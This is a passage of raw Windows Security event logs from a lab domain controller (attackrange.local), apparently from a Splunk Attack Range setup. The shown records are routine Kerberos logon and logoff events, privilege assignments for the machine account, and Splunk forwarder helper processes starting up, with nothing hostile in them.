Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263944
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789C23
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263943
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x789C23
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51675
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263942
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789C23
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263941
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789BB7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263940
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x789BB7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51674
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263939
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789BB7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263947
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78A976
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263946
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78A976
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51684
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263945
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78A976
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263949
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xde0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263948
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x179c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263950
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x165c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x144c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263952
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfa4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263954
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x114c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263953
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263957
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E435
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263956
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E435
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51697
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:38:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263955
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E435
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263968
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E8E3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263967
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78E9D1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263966
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EA19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263965
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78EAD2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51704
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263964
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EAD2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263963
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78EA19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51701
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263962
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78EA19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:39:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263961
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78E9D1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
